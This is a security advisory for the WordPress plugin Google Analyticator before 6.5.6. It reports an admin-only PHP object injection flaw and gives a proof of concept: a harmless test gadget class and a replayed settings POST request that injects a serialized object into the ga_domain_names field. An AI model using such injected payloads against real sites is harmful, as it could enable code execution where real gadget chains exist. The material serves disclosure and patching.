Nguyễn Phạm VIệt NamWPVDB-ID:DF1C36BB-9861-4272-89C9-AE76E62F687CGoogle Analyticator < 6.5.6 - Admin+ PHP Object Injection
0.001 Low
EPSS
Percentile
36.6%
The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.
PoC
To simulate a gadget chain, put the following code in the plugin: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Then, as Admin, go to the plugin settings page (/wp-admin/admin.php?page=google-analyticator), save them and intercept the request made, then add ga_domain_names=O:4:“Evil”:0:{}; to it and replay it: POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1 _wpnonce=&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga;_status=disabled&ga;_uid=UA-XXXXXXXX-X&ga;_analytic_snippet=disabled&key;_ga_show_ad=1&info;_update=Save+Changes&ga;_annon=0&ga;_admin_status=enabled&ga;_admin_role%5B%5D=administrator&ga;_admin_disable=remove&ga;_admin_disable_DimentionIndex=&ga;_enable_remarketing=0&key;_ga_track_login=0&ga;_outbound=enabled&ga;_event=enabled&ga;_enhanced_link_attr=disabled&ga;_downloads=&ga;_outbound_prefix=outgoing&ga;_downloads_prefix=download&ga;_adsense=&ga;_extra=&ga;_extra_after=&ga;_widgets=enabled&ga;_dashboard_role%5B%5D=administrator&ga;_domain_names=O:4:“Evil”:0:{}; The response will contain the “Arbitrary deserialization” output.
| CPE | Name | Operator | Version |
|---|---|---|---|
| google-analyticator | lt | 6.5.6 |
Related
